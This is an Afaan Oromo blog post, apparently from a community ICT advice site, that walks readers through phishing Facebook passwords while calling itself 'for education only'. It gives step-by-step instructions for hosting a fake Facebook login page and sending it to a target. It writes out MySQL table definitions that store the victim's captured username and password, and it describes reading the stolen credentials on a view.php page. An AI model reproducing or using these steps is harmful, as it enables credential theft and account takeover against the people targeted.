Hanna Koompitaraa Seerawaa Leenjii fi Gorsa TQO Marsaalee Ammee

Maloota Sasalphaa 5 kanneen Jechadarbii(Password) Eenyummeessaa Feesbuukii baruuf gargaaran – Barnootaaf


Yeroo ammaa ummanni keenya hedduun eenyummeessaa Feesbuukii banachuu ykn baafachuudhaan tajaajiloota adda addaatiif itti dhimma bahaa jiru. kanneen keessaa muraasni:
~ Firaaf Maatii isaanii addunyaa garagaraa jiraataniin walqunnamuuf(Haasaa keessootiin – inbox, Haasaa Sagalee ykn Suursagaleetiin-sound or video call)dhaan.
~ Daldalaafi beeksisa daldalaatiif
~ Barumsaa kennuufi argachuuf
~ Gareedhaan gurmaayuufi gurmeessuuf(garee siyaasaa, kan amantii, kan sanyiifikkf…)
~

Haaluma kanaan hedduun keenya eenyummeessaa Feesbuukii keenyaa kan dhimma itti baanu yommuu tahu, Eenyummeessaan namootaa akkuma dandeettiifi hojiisaaniitiin hiriyyummaa, maamiltootaafi hordoftoota hedduuminaan garagaraa kan qabaniidha.
Kanumarraa ka’uudhaan, yeroo ammaa addunyaa gara ganda tokkotti fiduuf hojii hojjatamaa jiru keessatti Feesbuukiin gahee olaanaa tahphachaa jira, akkasumas Dirree daldalaaniifi daldalatootni waan barbaadan itti argatan tahuu bira darbee qabeenya olaanaa argamsiisuufillee giddugala daldalaa addunyaa irraa sadarkaa duraarra jiran keessatti hiriiree argama.

Kanumarraa ka’uun, Eenyummeessaa keenyaaf Ofeeggannoon addaa godhamuu akka qabu, Seerriifi Heerri Dhaabbatichi yeroo yerotto jijijjiiraa Maamiltootasaatiif yaadachiisa ergurraa namni heddu hubateera.
Eenyummeessaa keenyaaf of-eeggannoo akkamii gochuu nubarbaachisa isa jedhu duratti, Eenyummeessaan keenya kun karaalee sasalphaa tahan kan namootni hedduun itti walmiidhuu ykn Eenyummeessaa keenya balleessuu danda’an baruun bu’aa qaba jennee waan yaadneef, tooftaalee sasalphaa kanneen keessaa, Maloota 5 asii gaditti ibsuuf yaalla, nu duuka bu’aa…




Hubachiisa, Maloota Sasalphaa 5 kanneen Jechadarbii(Password) Eenyummeessaa Feesbuukii baruuf gargaaran yeroo barreessinu Barnootaaf qofa, Nama seer-alummaadhaaf dhimma bahe nuti ittin gaafatamnu.

Jalqabarratti:
1. Fuula feesbuukii Karaala(Offline Facebook Page) naqadhu.
2. Kuusdeetaa(detabase MYSQL, SQL, …) qabaachuu qabdu. Sana booda ajaja asiin gadiiraawwachiisaa. ani MYSQL fayyadame.


— Table structure for table `fb_fail`

CREATE TABLE IF NOT EXISTS `fb_fail` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`uname` varchar(255) NOT NULL,
`pwd` varchar(255) NOT NULL,
`date` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

— ——————————————————–


— Table structure for table `fb_login`

CREATE TABLE IF NOT EXISTS `fb_login` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`uname` varchar(255) NOT NULL,
`pwd` varchar(255) NOT NULL,
`date` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;


— Dumping data for table `fb_login`




Tartiiba 5n kan Jechadarbii(Password) eenyummeessaa Facebook tokko argachuuf gargaaran:
1ffaa) – Fuula feesbuukii Karaala(Offline Facebook Page) naqadhu.

2ffaa) – Deetaa facebook.rar naqattan yoo diigdan(unzip) faayiloota akka – index.php, login.php, fi view.php argattu. Kana booda, Faayilota kanneen keessaa kuusdeetaa keenya wajjiin kanneen walqunnamsiifnu – login.php fi view.php akkaataa tartiiba faayilichaafi kuusdeetaa(database) walsimsiisuudhaan.

Kunis akka suuraa asiin gadiirraa muldhatutti, login.php dhaaf.

 

3ffaa) View.php immoo




4ffaa) – Fuulli sobaa feesbuukii naqanne sun kana fakkaata.

5ffaa) Fuula sobaa kana nama Jechadarbii eenyummeessaasaa barbaadnutti ergina. Sana booda namni sun yeroo Eenyummeessaasaa seenu(login godhu) Odeeffannoon namni sun eenyummeessaa banuuuf itti galchu akkuma jirutti view.php irratti ilaaluu ni dandeenya jechuudha.
View.php illeen kunoo kana fakkaata.



HORAA BULAA DEEBANAA

#Kaayyoon_keenya : Hubannoo hawaaasa keenyaa Cimsuudha.

Horaa Bulaa Deebanaa
OROMO ICT Team
E-mail: oromoict@gmail.com
Web: Gorsa ICT www.oroict.com
Barnoota Afaan Oromootiif :www.afaan-oromoo.com
Gita Hojii Banaa argachuuf: www.hojii.net
Gorsa Fayyaatiif: https://fayyaa.afaan-oromoo.com/

Author

abdiisaa

Leave a comment

Your email address will not be published. Required fields are marked *